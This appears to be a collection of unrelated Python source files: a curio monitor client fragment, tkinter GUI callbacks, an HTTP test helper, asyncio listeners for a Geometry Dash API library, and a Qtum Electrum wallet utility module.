finally:
tn.close()
def main():
parser = argparse.ArgumentParser("usage: python -m curio.monitor [options]")
parser.add_argument("-H", "--host", dest="monitor_host",
default=MONITOR_HOST, type=str,
help="monitor host ip")
parser.add_argument("-p", "--port", dest="monitor_port",
default=MONITOR_PORT, type=int,
help="monitor port number")
args = parser.parse_args()
monitor_client(args.monitor_host, args.monitor_port)
if __name__ == '__main__':
main()
|
Callbacks_Refactored.py
|
'''
Created on Aug 22, 2015
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from time import sleep
from threading import Thread
from pytz import all_timezones, timezone
from datetime import datetime
class Callbacks():
def __init__(self, oop):
self.oop = oop
def defaultFileEntries(self):
self.oop.fileEntry.delete(0, tk.END)
self.oop.fileEntry.insert(0, 'Z:\\') # bogus path
self.oop.fileEntry.config(state='readonly')
self.oop.netwEntry.delete(0, tk.END)
self.oop.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.oop.combo.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.oop.spin.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.oop.chVarUn.get(): self.oop.check3.configure(state='disabled')
else: self.oop.check3.configure(state='normal')
if self.oop.chVarEn.get(): self.oop.check2.configure(state='disabled')
else: self.oop.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.oop.radVar.get()
if radSel == 0: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[0])
elif radSel == 1: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[1])
elif radSel == 2: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[2])
# Exit GUI cleanly
def _quit(self):
self.oop.win.quit()
self.oop.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.oop.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
        print('methodInAThread():', self.oop.runT.is_alive())
# Running methods in Threads
def createThread(self, num):
self.oop.runT = Thread(target=self.oop.methodInAThread, args=[num])
        self.oop.runT.daemon = True
self.oop.runT.start()
print(self.oop.runT)
        print('createThread():', self.oop.runT.is_alive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.oop.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.oop.guiQueue.get()
print(qItem)
self.oop.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.oop.bookTitle.get()
page = self.oop.pageNumber.get()
quote = self.oop.quote.get(1.0, tk.END)
print(title)
print(quote)
self.oop.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.oop.mySQL.showBooks()
print(allBooks)
self.oop.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
# TZ Button callback
def allTimeZones(self):
for tz in all_timezones:
self.oop.scr.insert(tk.INSERT, tz + '\n')
# TZ Local Button callback
def localZone(self):
from tzlocal import get_localzone
self.oop.scr.delete('1.0', tk.END)
self.oop.scr.insert(tk.INSERT, get_localzone())
# Format local US time with TimeZone info
def getDateTime(self):
fmtStrZone = "%Y-%m-%d %H:%M:%S %Z%z"
# Get Coordinated Universal Time
utc = datetime.now(timezone('UTC'))
self.oop.log.writeToLog(utc.strftime(fmtStrZone),
self.oop.level.MINIMUM)
# Convert UTC datetime object to Los Angeles TimeZone
la = utc.astimezone(timezone('America/Los_Angeles'))
self.oop.log.writeToLog(la.strftime(fmtStrZone),
self.oop.level.NORMAL)
# Convert UTC datetime object to New York TimeZone
ny = utc.astimezone(timezone('America/New_York'))
self.oop.log.writeToLog(ny.strftime(fmtStrZone),
self.oop.level.DEBUG)
# update GUI label with NY Time and Zone
self.oop.lbl2.set(ny.strftime(fmtStrZone))
|
httpexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import httplib
CURDIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, CURDIR)
import uexpect
from threading import Thread, Event
from Queue import Queue, Empty
class IO(uexpect.IO):
def __init__(self, connection, response, queue, reader):
self.connection = connection
self.response = response
super(IO, self).__init__(None, None, queue, reader)
def write(self, data):
raise NotImplementedError
def close(self, force=True):
self.reader['kill_event'].set()
self.connection.close()
if self._logger:
self._logger.write('\n')
self._logger.flush()
def reader(response, queue, kill_event):
while True:
try:
if kill_event.is_set():
break
data = response.read(1)
queue.put(data)
except Exception, e:
if kill_event.is_set():
break
raise
def spawn(connection, request):
connection = httplib.HTTPConnection(**connection)
connection.request(**request)
response = connection.getresponse()
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(response, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(connection, response, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
if __name__ == '__main__':
with http({'host':'localhost','port':8123},{'method':'GET', 'url':'?query=SELECT%201'}) as client:
client.logger(sys.stdout)
client.timeout(2)
print client.response.status, client.response.reason
client.expect('1\n')
|
listener.py
|
import asyncio
import threading
import signal
import traceback
from gd.level import Level
from gd.logging import get_logger
from gd.typing import Client, Comment, FriendRequest, Iterable, List, Message, Optional, Union
from gd.utils import tasks
from gd.utils.async_utils import shutdown_loop, gather
from gd.utils.decorators import run_once
from gd.utils.filters import Filters
from gd.utils.text_tools import make_repr
__all__ = (
"AbstractListener",
"TimelyLevelListener",
"RateLevelListener",
"MessageOrRequestListener",
"LevelCommentListener",
"thread",
"get_loop",
"set_loop",
"run",
"differ",
"all_listeners",
)
loop = asyncio.new_event_loop()
log = get_logger(__name__)
all_listeners = []
def get_loop() -> asyncio.AbstractEventLoop:
return loop
def set_loop(new_loop: asyncio.AbstractEventLoop) -> None:
global loop
loop = new_loop
def run(loop: asyncio.AbstractEventLoop) -> None:
try:
loop.add_signal_handler(signal.SIGINT, loop.stop)
loop.add_signal_handler(signal.SIGTERM, loop.stop)
except (NotImplementedError, RuntimeError):
pass
asyncio.set_event_loop(loop)
try:
loop.run_forever()
except KeyboardInterrupt:
log.info("Received the signal to terminate the event loop.")
finally:
log.info("Cleaning up tasks.")
shutdown_loop(loop)
def update_thread_loop(thread: threading.Thread, loop: asyncio.AbstractEventLoop) -> None:
thread.args = (loop,)
thread = threading.Thread(target=run, args=(loop,), name="ListenerThread", daemon=True)
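# Rough usage sketch (an assumption, not part of this module's documented API):
# point the module loop, the background thread and every existing listener at a
# fresh event loop, then start the thread so the listeners' runners are driven.
def _start_all_listeners_sketch(new_loop: asyncio.AbstractEventLoop) -> None:
    set_loop(new_loop)
    update_thread_loop(thread, new_loop)
    for listener in all_listeners:
        listener.attach_to_loop(new_loop)
        listener.enable()
    thread.start()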
class AbstractListener:
def __init__(
self,
client: Client,
delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
if loop is None:
loop = get_loop()
self.client = client
self.loop = loop
self.runner = tasks.loop(seconds=delay, loop=loop)(self.main)
self.cache = None
all_listeners.append(self)
def __repr__(self) -> str:
info = {"client": self.client, "loop": self.loop}
return make_repr(self, info)
def attach_to_loop(self, loop: asyncio.AbstractEventLoop) -> None:
"""Attach the runner to another event loop."""
self.runner.loop = loop
self.loop = loop
def enable(self) -> None:
try:
self.runner.start()
except RuntimeError:
pass
@run_once
def close(self, *args, force: bool = True) -> None:
"""Accurately shutdown a listener.
If force is true, cancel the runner, and wait until it finishes otherwise.
"""
if force:
self.runner.cancel()
else:
self.runner.stop()
async def on_error(self, exc: Exception) -> None:
"""Basic event handler to print the errors if any occur."""
traceback.print_exc()
async def setup(self) -> None:
"""This function is used to do some preparations before starting listeners."""
pass
async def scan(self) -> None:
"""This function should contain main code of the listener."""
pass
async def main(self) -> None:
"""Main function, that is basically doing all the job."""
await self.setup()
try:
await self.scan()
except Exception as exc:
await self.on_error(exc)
class TimelyLevelListener(AbstractListener):
def __init__(
self,
client: Client,
t_type: str,
        delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.method = getattr(client, "get_" + t_type)
self.call_method = "new_" + t_type
async def scan(self) -> None:
"""Scan for either daily or weekly levels."""
timely = await self.method()
if self.cache is None:
self.cache = timely
return
if timely.id != self.cache.id:
dispatcher = self.client.dispatch(self.call_method, timely)
self.loop.create_task(dispatcher) # schedule the execution
self.cache = timely
class RateLevelListener(AbstractListener):
def __init__(
self,
client: Client,
listen_to_rate: bool = True,
delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.client = client
self.call_method = "level_rated" if listen_to_rate else "level_unrated"
self.filters = Filters(strategy="awarded")
self.find_new = listen_to_rate
async def method(self, pages: int = 5) -> List[Level]:
return await self.client.search_levels(filters=self.filters, pages=range(pages))
async def scan(self) -> None:
new = await self.method()
if not new: # servers are probably broken, abort
return
if not self.cache:
self.cache = new
return
difference = differ(self.cache, new, self.find_new)
self.cache = new
for level in await further_differ(difference, self.find_new):
dispatcher = self.client.dispatch(self.call_method, level)
self.loop.create_task(dispatcher)
async def further_differ(array: Iterable[Level], find_new: bool = True) -> List[Level]:
array = list(array)
updated = await gather(level.refresh() for level in array)
final = list()
for level, new in zip(array, updated):
if find_new:
if new.is_rated() or new.has_coins_verified():
final.append(new)
else:
if new is None:
final.append(level)
elif not new.is_rated() and not new.has_coins_verified():
final.append(new)
return final
class MessageOrRequestListener(AbstractListener):
def __init__(
self,
client: Client,
listen_to_msg: bool = True,
delay: float = 5.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.client = client
self.to_call = "message" if listen_to_msg else "friend_request"
self.method = getattr(client, ("get_messages" if listen_to_msg else "get_friend_requests"))
async def call_method(self, pages: int = 10) -> Union[List[FriendRequest], List[Message]]:
return await self.method(pages=range(pages))
async def scan(self) -> None:
new = await self.call_method()
if not new:
return
if not self.cache:
self.cache = new
return
difference = list(differ(self.cache, new, True))
await gather(entity.read() for entity in difference)
self.cache = new
for entity in difference:
dispatcher = self.client.dispatch(self.to_call, entity)
self.loop.create_task(dispatcher)
class LevelCommentListener(AbstractListener):
def __init__(
self,
client: Client,
level_id: int,
delay: float = 10.0,
*,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(client, delay, loop=loop)
self.call_method = "level_comment"
self.level_id = level_id
async def load_level(self) -> None:
try:
self.level = await self.client.get_level(self.level_id, get_data=False)
except Exception:
self.level = Level(id=self.level_id, client=self.client)
async def method(self, amount: int = 1000) -> List[Comment]:
return await self.level.get_comments(amount=amount)
async def scan(self) -> None:
await self.load_level()
new = await self.method()
if not new:
return
if not self.cache:
self.cache = new
return
difference = differ(self.cache, new, True)
self.cache = new
for comment in difference:
dispatcher = self.client.dispatch(self.call_method, self.level, comment)
self.loop.create_task(dispatcher)
def differ(before: list, after: list, find_new: bool = True) -> filter:
# this could be improved a lot ~ nekit
if find_new:
for item in before:
# find a pivot
try:
after = after[: after.index(item)]
break
except ValueError: # not in list
pass
a, b = (before, after) if find_new else (after, before)
return filter(lambda elem: (elem not in a), b)
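# Illustrative sketch (hypothetical data, added only as an example): with
# find_new=True, differ() returns the entries of `after` that appear before the
# first element shared with `before`, i.e. the newly added items.
def _differ_demo() -> list:
    before = ["c", "b", "a"]
    after = ["e", "d", "c", "b", "a"]
    return list(differ(before, after, find_new=True))  # -> ["e", "d"]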
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import urllib.request, urllib.parse, urllib.error
import queue
import threading
import hmac
from struct import Struct
import webbrowser
import stat
from typing import NamedTuple, Optional
import inspect
from locale import localeconv
from .i18n import _
import aiohttp
from aiohttp_socks import SocksConnector, SocksVer
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'QTUM':8, 'mQTUM':5, 'uQTUM':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
unpack_int32_from = Struct('<i').unpack_from
unpack_int64_from = Struct('<q').unpack_from
unpack_uint16_from = Struct('<H').unpack_from
unpack_uint32_from = Struct('<I').unpack_from
unpack_uint64_from = Struct('<Q').unpack_from
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class QtumException(Exception): pass
# Throw this exception to unwind the stack, as when an error occurs.
# However, unlike other exceptions, the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class UserFacingException(Exception):
"""Exception that contains information intended to be shown to the user."""
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)' % self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return ''
def log_name(self):
msg = self.verbosity_filter or self.__class__.__name__
d = self.diagnostic_name()
if d: msg += "][" + d
return "[%s]" % msg
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error(self.log_name(), *msg)
def print_stderr(self, *msg):
print_stderr(self.log_name(), *msg)
def print_msg(self, *msg):
print_msg(self.log_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
        self.parent_thread = threading.current_thread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
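# Illustrative sketch (hypothetical function, added only as an example): any
# function wrapped with @profiler has its wall-clock run time reported through
# print_error when it is called.
def _profiler_demo():
    @profiler
    def slow_sum(n):
        return sum(range(n))
    # Calling it prints something like: [profiler] slow_sum 0.0312
    return slow_sum(10 ** 6)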
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.qtum.qtum_electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/qtum_electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def standardize_path(path):
return os.path.normcase(os.path.realpath(os.path.abspath(path)))
def get_new_wallet_name(wallet_folder: str) -> str:
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
return filename
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc) -> str:
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8') -> bytes:
"""
    Cast a string to a bytes-like object; a bytearray is copied to bytes (Python 2 porting helper).
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return x.hex()
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".qtum-electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Qtum-Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Qtum-Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
# absolute path to python package folder of electrum ("lib")
pkg_dir = os.path.split(os.path.realpath(__file__))[0]
def resource_path(*parts):
return os.path.join(pkg_dir, *parts)
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
# format string
decimal_format = "." + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
# initial result
scale_factor = pow(10, decimal_point)
if not isinstance(x, Decimal):
x = Decimal(x).quantize(Decimal('1E-8'))
result = ("{:" + decimal_format + "f}").format(x / scale_factor)
if "." not in result: result += "."
result = result.rstrip('0')
# extra decimal places
integer_part, fract_part = result.split(".")
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + DECIMAL_POINT + fract_part
# leading/trailing whitespaces
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
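# Illustrative sketch (hypothetical helper, added only as an example): expected
# output of format_satoshis for a locale whose decimal point is '.'.
def _format_satoshis_demo():
    print(format_satoshis(1234500))                  # -> 0.012345
    print(format_satoshis(1234500, num_zeros=8))     # -> 0.01234500
    print(format_satoshis(-1234500, is_diff=True))   # -> -0.012345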
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, *, num_zeros=0, precision=None):
if precision is None:
precision = FEERATE_PRECISION
num_zeros = min(num_zeros, FEERATE_PRECISION) # no more zeroes than available prec
return format_satoshis(fee, num_zeros=num_zeros, decimal_point=0, precision=precision)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
def block_explorer_info():
from . import constants
from .qtum import testnet_block_explorers, mainnet_block_explorers
if constants.net.TESTNET:
return testnet_block_explorers
else:
return mainnet_block_explorers
def block_explorer(config):
bbb = config.get('block_explorer', 'qtum.info')
return bbb
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, params):
"""
:param config:
:type params: dict
:return: str
"""
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
token = params.get('token')
addr = params.get('addr')
if token:
if 'qtum.org' in be_tuple[0]:
return "{}/token/{}?a={}".format(be_tuple[0], token, addr)
if 'qtum.info' in be_tuple[0]:
return "{}/address/{}/token-balance?tokens={}".format(be_tuple[0], addr, token)
url_parts = [be_tuple[0], ]
for k, v in params.items():
kind_str = be_tuple[1].get(k)
if not kind_str:
continue
url_parts.append(kind_str)
url_parts.append(v)
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a qtum address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'qtum':
raise Exception("Not a qtum URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid qtum address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
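# Illustrative sketch (hypothetical helper, added only as an example): for a
# valid qtum address `addr`, and assuming COIN == 10**8, parse_URI converts a
# BIP21-style URI into a dict with the amount expressed in satoshis.
def _parse_uri_demo(addr):
    out = parse_URI("qtum:{}?amount=1.5&message=donation".format(addr))
    # out -> {'address': addr, 'amount': 150000000,
    #         'message': 'donation', 'memo': 'donation'}
    return out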
def create_bip21_uri(addr, amount_sat: Optional[int], message: Optional[str],
*, extra_query_params: Optional[dict] = None) -> str:
from . import qtum
if not qtum.is_address(addr):
return ""
if extra_query_params is None:
extra_query_params = {}
query = []
if amount_sat:
query.append('amount=%s' % format_satoshis_plain(amount_sat))
if message:
query.append('message=%s' % urllib.parse.quote(message))
for k, v in extra_query_params.items():
if not isinstance(k, str) or k != urllib.parse.quote(k):
raise Exception(f"illegal key for URI: {repr(k)}")
v = urllib.parse.quote(v)
query.append(f"{k}={v}")
p = urllib.parse.ParseResult(scheme='qtum', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return str(urllib.parse.urlunparse(p))
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
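# Illustrative sketch (hypothetical data, added only as an example): parse_json
# consumes one newline-terminated JSON message and returns the remainder.
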